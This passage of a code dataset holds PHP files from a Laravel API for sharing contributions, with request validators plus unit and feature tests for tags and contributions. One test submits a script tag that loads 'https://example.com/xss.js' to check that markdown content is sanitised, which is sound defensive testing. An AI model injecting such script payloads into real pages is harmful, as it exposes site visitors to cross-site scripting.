"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Contribution;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\n\nclass IndexContributionRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'filter[end_user_id]' => [\n 'bail',\n function (string $attribute, string $endUserIds, callable $fail): void {\n if (!$this->user('api')->isEndUser()) {\n return;\n }\n\n foreach (explode(',', $endUserIds) as $endUserId) {\n if ($this->user('api')->endUser->id !== $endUserId) {\n $fail('End users can only filter by their own ID.');\n }\n }\n },\n ],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5143442749977112,
"alphanum_fraction": 0.5204917788505554,
"avg_line_length": 24.6842098236084,
"blob_id": "c80aef375d38d6cb08c008f310c568e39f8b1a61",
"content_id": "309ff895fa3f73b3f021e0b4f0ce207b9e1a5b49",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 976,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 38,
"path": "/app/Http/Requests/Contribution/StoreContributionRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Contribution;\n\nuse App\\Models\\Contribution;\nuse App\\Rules\\Words;\nuse App\\Support\\Enum;\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass StoreContributionRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @throws \\ReflectionException\n * @return array\n */\n public function rules(): array\n {\n return [\n 'content' => ['bail', 'required', 'string', 'max:10000', new Words()],\n 'status' => [\n 'bail',\n 'required',\n 'string',\n Rule::in(\n (new Enum(Contribution::class))->getValues('STATUS')\n ),\n ],\n 'tags' => ['bail', 'present', 'array'],\n 'tags.*' => ['bail', 'array'],\n 'tags.*.id' => ['bail', 'exists:tags,id', 'distinct'],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5490092039108276,
"alphanum_fraction": 0.549186110496521,
"avg_line_length": 29.06382942199707,
"blob_id": "68c384d80b626bd7b9fd5ebdd45398033e0e23e4",
"content_id": "51139701017e4dd52ccf4fdaf79cee58eab0d396",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 5652,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 188,
"path": "/tests/Unit/Services/TagServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Tag\\TagCreated;\nuse App\\Events\\Tag\\TagForceDeleted;\nuse App\\Events\\Tag\\TagSoftDeleted;\nuse App\\Models\\Contribution;\nuse App\\Models\\Tag;\nuse App\\Services\\TagService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass TagServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_a_tag_record(): void\n {\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create();\n\n $tag = $tagService->create([\n 'parent_tag_id' => $parentTag->id,\n 'name' => 'New Tag',\n ]);\n\n $this->assertDatabaseHas('tags', ['id' => $tag->id]);\n $this->assertEquals($parentTag->id, $tag->parentTag->id);\n $this->assertEquals('New Tag', $tag->name);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_created(): void\n {\n Event::fake([TagCreated::class]);\n\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n $tag = $tagService->create([\n 'name' => 'New Tag',\n ]);\n\n Event::assertDispatched(\n TagCreated::class,\n function (TagCreated $event) use ($tag): bool {\n return $event->getTag()->is($tag);\n }\n );\n }\n\n /** @test */\n public function it_soft_deletes_a_tag_record(): void\n {\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create([\n 'parent_tag_id' => $parentTag->id,\n ]);\n\n $tag = $tagService->softDelete($tag);\n\n $this->assertDatabaseHas('tags', [\n 'id' => $parentTag->id,\n 'deleted_at' => null,\n ]);\n $this->assertDatabaseHas('tags', ['id' => $tag->id]);\n $this->assertSoftDeleted('tags', ['id' => $tag->id]);\n }\n\n /** @test */\n public function it_soft_deletes_a_parent_tag_along_with_child_records(): void\n {\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create([\n 'parent_tag_id' => $parentTag->id,\n ]);\n\n $parentTag = $tagService->softDelete($parentTag);\n\n $this->assertDatabaseHas('tags', ['id' => $parentTag->id]);\n $this->assertSoftDeleted('tags', ['id' => $parentTag->id]);\n $this->assertDatabaseHas('tags', ['id' => $tag->id]);\n $this->assertSoftDeleted('tags', ['id' => $tag->id]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_soft_deleted(): void\n {\n Event::fake([TagSoftDeleted::class]);\n\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $tagService->softDelete($tag);\n\n Event::assertDispatched(\n TagSoftDeleted::class,\n function (TagSoftDeleted $event) use ($tag): bool {\n return $event->getTag()->is($tag);\n }\n );\n }\n\n /** @test */\n public function it_force_deletes_a_parent_tag_along_with_child_records(): void\n {\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create([\n 'parent_tag_id' => $parentTag->id,\n ]);\n\n $tagService->forceDelete($parentTag);\n\n $this->assertDatabaseMissing('tags', ['id' => $parentTag->id]);\n $this->assertDatabaseMissing('tags', ['id' => $tag->id]);\n }\n\n /** @test */\n public function it_force_deletes_a_tag_along_with_contributions(): void\n {\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n $tagService->forceDelete($tag);\n\n $this->assertDatabaseMissing('tags', ['id' => $tag->id]);\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseMissing('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_force_deleted(): void\n {\n Event::fake([TagForceDeleted::class]);\n\n /** @var \\App\\Services\\TagService $tagService */\n $tagService = resolve(TagService::class);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $tagService->forceDelete($tag);\n\n Event::assertDispatched(\n TagForceDeleted::class,\n function (TagForceDeleted $event) use ($tag): bool {\n return $event->getTag()->is($tag);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5218106508255005,
"alphanum_fraction": 0.527212917804718,
"avg_line_length": 31.436052322387695,
"blob_id": "421e1082e61152a52a67c94e525e370637777857",
"content_id": "22b71e8c2de982875f8f932859acb354408afc37",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 32209,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 993,
"path": "/tests/Feature/V1/ContributionControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Mail\\TemplateMail;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Setting;\nuse App\\Models\\Tag;\nuse App\\VariableSubstitution\\Email\\Admin\\NewContributionSubstituter;\nuse App\\VariableSubstitution\\Email\\Admin\\UpdatedContributionSubstituter;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Illuminate\\Support\\Facades\\Queue;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass ContributionControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_can_index(): void\n {\n $response = $this->getJson('/v1/contributions');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function end_user_can_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n $contribution = factory(Contribution::class)->create();\n $tag = factory(Tag::class)->create();\n $contribution->tags()->attach($tag);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertCollectionDataStructure([\n 'id',\n 'end_user_id',\n 'content',\n 'excerpt',\n 'status',\n 'changes_requested',\n 'status_last_updated_at',\n 'created_at',\n 'updated_at',\n 'tags' => [\n '*' => [\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $contribution = factory(Contribution::class)->create();\n $tag = factory(Tag::class)->create();\n $contribution->tags()->attach($tag);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertJsonFragment([\n [\n 'id' => $contribution->id,\n 'end_user_id' => $contribution->endUser->id,\n 'content' => $contribution->content,\n 'excerpt' => $contribution->getExcerpt(),\n 'status' => $contribution->status,\n 'changes_requested' => $contribution->changes_requested,\n 'status_last_updated_at' => $contribution->status_last_updated_at->toIso8601String(),\n 'created_at' => $contribution->created_at->toIso8601String(),\n 'updated_at' => $contribution->updated_at->toIso8601String(),\n 'tags' => [\n [\n 'id' => $tag->id,\n 'parent_tag_id' => $tag->parent_tag_id,\n 'name' => $tag->name,\n 'public_contributions_count' => $tag->publicContributions()->count(),\n 'created_at' => $tag->created_at->toIso8601String(),\n 'updated_at' => $tag->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ],\n ],\n ],\n ]);\n }\n\n /** @test */\n public function can_filter_by_ids_for_index(): void\n {\n $contribution1 = factory(Contribution::class)->create();\n $contribution2 = factory(Contribution::class)->create();\n $contribution3 = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions', [\n 'filter[id]' => \"{$contribution1->id},{$contribution2->id}\",\n ]);\n\n $response->assertJsonFragment(['id' => $contribution1->id]);\n $response->assertJsonFragment(['id' => $contribution2->id]);\n $response->assertJsonMissing(['id' => $contribution3->id]);\n }\n\n /** @test */\n public function admin_can_filter_by_end_user_id_for_index(): void\n {\n $contribution1 = factory(Contribution::class)->create();\n $contribution2 = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions', ['filter[end_user_id]' => $contribution1->endUser->id]);\n\n $response->assertJsonFragment(['id' => $contribution1->id]);\n $response->assertJsonMissing(['id' => $contribution2->id]);\n }\n\n /** @test */\n public function can_filter_by_tag_ids_for_index(): void\n {\n $contribution1 = factory(Contribution::class)->create();\n $tag1 = factory(Tag::class)->create();\n $contribution1->tags()->attach($tag1);\n\n $contribution2 = factory(Contribution::class)->create();\n $tag2 = factory(Tag::class)->create();\n $contribution2->tags()->attach($tag2);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions', ['filter[tag_ids]' => $tag1->id]);\n\n $response->assertJsonFragment(['id' => $contribution1->id]);\n $response->assertJsonMissing(['id' => $contribution2->id]);\n }\n\n /** @test */\n public function can_filter_by_untagged_for_index(): void\n {\n $contribution1 = factory(Contribution::class)->create();\n $tag1 = factory(Tag::class)->create(['deleted_at' => Date::now()]);\n $contribution1->tags()->attach($tag1);\n\n $contribution2 = factory(Contribution::class)->create();\n $tag2 = factory(Tag::class)->create();\n $contribution2->tags()->attach($tag2);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions', ['filter[tag_ids]' => 'untagged']);\n\n $response->assertJsonFragment(['id' => $contribution1->id]);\n $response->assertJsonMissing(['id' => $contribution2->id]);\n }\n\n /** @test */\n public function can_sort_by_created_at_for_index(): void\n {\n $contribution1 = factory(Contribution::class)->create([\n 'created_at' => Date::now(),\n ]);\n $contribution2 = factory(Contribution::class)->create([\n 'created_at' => Date::now()->addHour(),\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/contributions', ['sort' => '-created_at']);\n\n $response->assertNthIdInCollection(1, $contribution1->id);\n $response->assertNthIdInCollection(0, $contribution2->id);\n }\n\n /** @test */\n public function guest_can_only_view_public_for_index(): void\n {\n $publicContribution = factory(Contribution::class)\n ->create();\n $privateContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create();\n $inReviewContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n $changesRequestedContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertJsonFragment(['id' => $publicContribution->id]);\n $response->assertJsonMissing(['id' => $privateContribution->id]);\n $response->assertJsonMissing(['id' => $inReviewContribution->id]);\n $response->assertJsonMissing(['id' => $changesRequestedContribution->id]);\n }\n\n /** @test */\n public function end_user_can_only_view_public_and_their_own_for_index(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $endUserContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create(['end_user_id' => $endUser->id]);\n $publicContribution = factory(Contribution::class)\n ->create();\n $privateContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create();\n $inReviewContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n $changesRequestedContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson('/v1/contributions');\n\n $response->assertJsonFragment(['id' => $endUserContribution->id]);\n $response->assertJsonFragment(['id' => $publicContribution->id]);\n $response->assertJsonMissing(['id' => $privateContribution->id]);\n $response->assertJsonMissing(['id' => $inReviewContribution->id]);\n $response->assertJsonMissing(['id' => $changesRequestedContribution->id]);\n }\n\n /** @test */\n public function end_user_can_filter_only_their_own_for_index(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $endUserContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create(['end_user_id' => $endUser->id]);\n $publicContribution = factory(Contribution::class)\n ->create();\n $privateContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create();\n $inReviewContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n $changesRequestedContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson('/v1/contributions', ['filter[end_user_id]' => $endUser->id]);\n\n $response->assertJsonFragment(['id' => $endUserContribution->id]);\n $response->assertJsonMissing(['id' => $publicContribution->id]);\n $response->assertJsonMissing(['id' => $privateContribution->id]);\n $response->assertJsonMissing(['id' => $inReviewContribution->id]);\n $response->assertJsonMissing(['id' => $changesRequestedContribution->id]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_index(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson('/v1/contributions');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === 'Viewed all contributions.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Store.\n */\n\n /** @test */\n public function guest_cannot_store(): void\n {\n $response = $this->postJson('/v1/contributions');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_can_store(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $tag = factory(Tag::class)->create();\n\n $response = $this->postJson('/v1/contributions', [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [\n ['id' => $tag->id],\n ],\n ]);\n\n $response->assertStatus(Response::HTTP_CREATED);\n }\n\n /** @test */\n public function admin_cannot_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/contributions');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function structure_correct_for_store(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $tag = factory(Tag::class)->create();\n\n $response = $this->postJson('/v1/contributions', [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [\n ['id' => $tag->id],\n ],\n ]);\n\n $response->assertResourceDataStructure([\n 'id',\n 'end_user_id',\n 'content',\n 'excerpt',\n 'status',\n 'changes_requested',\n 'status_last_updated_at',\n 'created_at',\n 'updated_at',\n 'tags' => [\n '*' => [\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_store(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n Date::setTestNow(Date::now());\n\n $response = $this->postJson('/v1/contributions', [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [\n ['id' => $tag->id],\n ],\n ]);\n\n $response->assertJsonFragment([\n 'end_user_id' => $endUser->id,\n 'content' => 'Lorem ipsum',\n 'excerpt' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'changes_requested' => null,\n 'status_last_updated_at' => Date::now()->toIso8601String(),\n 'created_at' => Date::now()->toIso8601String(),\n 'updated_at' => Date::now()->toIso8601String(),\n 'tags' => [\n [\n 'id' => $tag->id,\n 'parent_tag_id' => $tag->parent_tag_id,\n 'name' => $tag->name,\n 'public_contributions_count' => $tag->publicContributions()->count(),\n 'created_at' => $tag->created_at->toIso8601String(),\n 'updated_at' => $tag->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ],\n ],\n ]);\n }\n\n /** @test */\n public function content_markdown_is_sanitised_for_store(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->postJson('/v1/contributions', [\n 'content' => <<<'EOT'\n # This is the heading\n \n <p>This is a HTML paragraph.</p>\n \n This is a standard paragraph.\n \n <script src=\"https://example.com/xss.js\"></script>\n EOT,\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [],\n ]);\n\n $response->assertJsonFragment([\n 'content' => <<<'EOT'\n # This is the heading\n \n This is a HTML paragraph.\n \n This is a standard paragraph.\n EOT,\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_store(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(EndUser::class)->create()->user;\n\n Passport::actingAs($user);\n\n $response = $this->postJson('/v1/contributions', [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [],\n ]);\n\n $contribution = Contribution::findOrFail($response->getId());\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($contribution, $user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_CREATE\n && $event->getDescription() === \"Created contribution [{$contribution->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /** @test */\n public function email_sent_to_admins_for_store(): void\n {\n Queue::fake();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(EndUser::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->postJson('/v1/contributions', [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [],\n ]);\n\n Queue::assertPushed(\n TemplateMail::class,\n function (TemplateMail $mail): bool {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n return $mail->getTo() === config('connecting_voices.admin_email')\n && $mail->getSubject() === Arr::get($emailContent, 'admin.new_contribution.subject')\n && $mail->getBody() === Arr::get($emailContent, 'admin.new_contribution.body')\n && $mail->getSubstituter() instanceof NewContributionSubstituter;\n }\n );\n }\n\n /*\n * Show.\n */\n\n /** @test */\n public function when_public_guest_can_show(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n $response = $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function when_public_end_user_can_show(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function when_public_admin_can_show(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_show(): void\n {\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n $contribution->tags()->sync([\n factory(Tag::class)->create()->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertResourceDataStructure([\n 'id',\n 'end_user_id',\n 'content',\n 'excerpt',\n 'status',\n 'changes_requested',\n 'status_last_updated_at',\n 'created_at',\n 'updated_at',\n 'tags' => [\n '*' => [\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_show(): void\n {\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertJsonFragment([\n 'id' => $contribution->id,\n 'end_user_id' => $contribution->end_user_id,\n 'content' => $contribution->content,\n 'excerpt' => $contribution->getExcerpt(),\n 'status' => $contribution->status,\n 'changes_requested' => null,\n 'status_last_updated_at' => $contribution->status_last_updated_at->toIso8601String(),\n 'created_at' => $contribution->created_at->toIso8601String(),\n 'updated_at' => $contribution->updated_at->toIso8601String(),\n 'tags' => [\n [\n 'id' => $tag->id,\n 'parent_tag_id' => $tag->parent_tag_id,\n 'name' => $tag->name,\n 'public_contributions_count' => $tag->publicContributions()->count(),\n 'created_at' => $tag->created_at->toIso8601String(),\n 'updated_at' => $tag->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ],\n ],\n ]);\n }\n\n /** @test */\n public function guest_cannot_only_view_private_for_show(): void\n {\n $privateContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create();\n\n $response = $this->getJson(\"/v1/contributions/{$privateContribution->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function end_user_can_view_their_own_for_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $endUserPrivateContribution = $privateContribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create(['end_user_id' => $endUser->id]);\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson(\"/v1/contributions/{$endUserPrivateContribution->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_show(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\Contribution $contribution*/\n $contribution = factory(Contribution::class)->create();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson(\"/v1/contributions/{$contribution->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($contribution, $user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed contribution [{$contribution->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Update.\n */\n\n /** @test */\n public function guest_cannot_update(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_use_someone_elses_to_update(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function end_user_can_use_their_own_to_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $contribution = factory(Contribution::class)->create([\n 'end_user_id' => $endUser->id,\n ]);\n\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}\", [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_IN_REVIEW,\n 'tags' => [\n ['id' => $tag->id],\n ],\n ]);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_cannot_update(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_update(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $endUser */\n $endUser = factory(EndUser::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution*/\n $contribution = factory(Contribution::class)->create([\n 'end_user_id' => $endUser->id,\n ]);\n\n Passport::actingAs($endUser->user);\n\n $this->putJson(\"/v1/contributions/{$contribution->id}\", [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_IN_REVIEW,\n 'tags' => [],\n ]);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($contribution, $endUser): bool {\n return $event->getUser()->is($endUser->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_UPDATE\n && $event->getDescription() === \"Updated contribution [{$contribution->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /** @test */\n public function email_sent_to_admins_for_update(): void\n {\n Queue::fake();\n\n /** @var \\App\\Models\\User $endUser */\n $endUser = factory(EndUser::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution*/\n $contribution = factory(Contribution::class)->create([\n 'end_user_id' => $endUser->id,\n ]);\n\n Passport::actingAs($endUser->user);\n\n $this->putJson(\"/v1/contributions/{$contribution->id}\", [\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_IN_REVIEW,\n 'tags' => [],\n ]);\n\n Queue::assertPushed(\n TemplateMail::class,\n function (TemplateMail $mail): bool {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n return $mail->getTo() === config('connecting_voices.admin_email')\n && $mail->getSubject() === Arr::get($emailContent, 'admin.updated_contribution.subject')\n && $mail->getBody() === Arr::get($emailContent, 'admin.updated_contribution.body')\n && $mail->getSubstituter() instanceof UpdatedContributionSubstituter;\n }\n );\n }\n\n /*\n * Destroy.\n */\n\n /** @test */\n public function guest_cannot_destroy(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n $response = 